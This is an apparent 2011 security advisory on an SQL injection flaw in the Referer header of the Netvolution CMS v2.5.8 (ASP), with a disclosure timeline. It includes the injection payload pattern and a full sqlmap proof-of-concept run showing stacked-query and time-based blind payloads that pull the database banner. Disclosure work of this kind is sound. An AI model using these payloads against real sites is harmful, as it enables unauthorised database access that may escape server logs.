|Affected Products:||Netvolution v2.5.8 (ASP). Other versions may also be vulnerable.|
|Class:||Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) (CWE-89)|
|Discovered by:||Patroklos Argyroudis|
|Researched and Exploited by:||Dimitris Glynos|
Netvolution is a commercial content management system by ATCOM S.A. with a large number of installations, most of them belonging to Greek companies and organizations.
It appears that the Netvolution platform has both ASP and PHP implementations. This advisory concerns a bug found in the ASP implementation (version 2.5.8). We were unable to verify with the vendor if this bug also affects other versions of the ASP (or PHP) codebase.
The bug is located in the code that parses the “HTTP Referer” header value. An attacker may inject arbitrary SQL commands to the Netvolution database by using a “Referer” header like the following:
Referer: 1','0'); SQL
In the above example “SQL” is a placeholder; the attacker would replace this with the SQL commands to be executed by the database. The CMS does not provide feedback on the output of the SQL commands but collection of this output is still possible through “blind” SQL Injection techniques.
The following Proof of Concept, shows sqlmap mounting a blind SQL injection attack on a vulnerable website and retrieving the database banner:
user@host:~/sqlmap$ ./sqlmap.py -u \ 'http://site.com/default.asp?pid=45&la=1&nid=100&ny=2011' -p referer \ --referer="1','0'); " -b sqlmap/1.0-dev (r4379) — automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 11:01:55 [11:01:56] [WARNING] the testable parameter 'referer' you provided is not inside the GET [11:01:56] [INFO] using '/home/user/sqlmap/output/site.com/session' as session file [11:01:56] [INFO] testing connection to the target url [11:01:57] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests [11:01:57] [WARNING] the testable parameter 'referer' you provided is not inside the Cookie [11:01:57] [INFO] testing if the url is stable, wait a few seconds [11:01:59] [INFO] url is stable [11:01:59] [INFO] testing if Referer parameter 'Referer' is dynamic [11:01:59] [WARNING] Referer parameter 'Referer' appears to be not dynamic [11:02:00] [INFO] heuristic test shows that Referer parameter 'Referer' might be injectable (possible DBMS: Microsoft SQL Server) [11:02:00] [INFO] testing sql injection on Referer parameter 'Referer' [11:02:00] [INFO] testing 'AND boolean-based blind — WHERE or HAVING clause' parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y [11:02:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based — WHERE or HAVING clause' [11:02:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [11:02:31] [INFO] Referer parameter 'Referer' is 'Microsoft SQL Server/Sybase stacked queries' injectable [11:02:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [11:02:43] [INFO] Referer parameter 'Referer' is 'Microsoft SQL Server/Sybase time-based blind' injectable [11:02:43] [INFO] testing 'Generic UNION query (NULL) — 1 to 10 columns' Referer parameter 'Referer' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 33 HTTP(s) requests: --- Place: Referer Parameter: Referer Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: 1','0'); ; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: 1','0'); WAITFOR DELAY '0:0:5'-- --- [11:02:58] [INFO] testing Microsoft SQL Server [11:02:59] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries [11:03:04] [INFO] confirming Microsoft SQL Server do you want to adjust the time delay to 3 seconds (due to good response times)? [Y/n] Y [11:03:41] [INFO] the back-end DBMS is Microsoft SQL Server [11:03:41] [INFO] fetching banner web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS operating system: Windows 2003 Service Pack 2 back-end DBMS: Microsoft SQL Server 2005 banner: --- Microsoft SQL Server 2005 — 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [11:58:52] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) — 21 times [11:58:52] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/site.com' [*] shutting down at 11:58:52
Although Netvolution has been found to be vulnerable to numerous injection attacks in the past (1, 2, 3) this particular bug is especially interesting as it manifests itself in a HTTP header field. As header field values are sometimes not included in HTTP transaction logs, an attack based on this vulnerability may go unnoticed by web server administrators.
The vendor has responded to this advisory with an update to the CMS software. Administrators of Netvolution websites must check with the software vendor to ensure that they are running a non-vulnerable version of the CMS.
|CVE assignment:||August 30th, 2011|
|Vendor Contact(s):||August 31st, 2011|
|September 1st, 2011|
|September 27th, 2011|
|Public Disclosure:||October 3rd, 2011|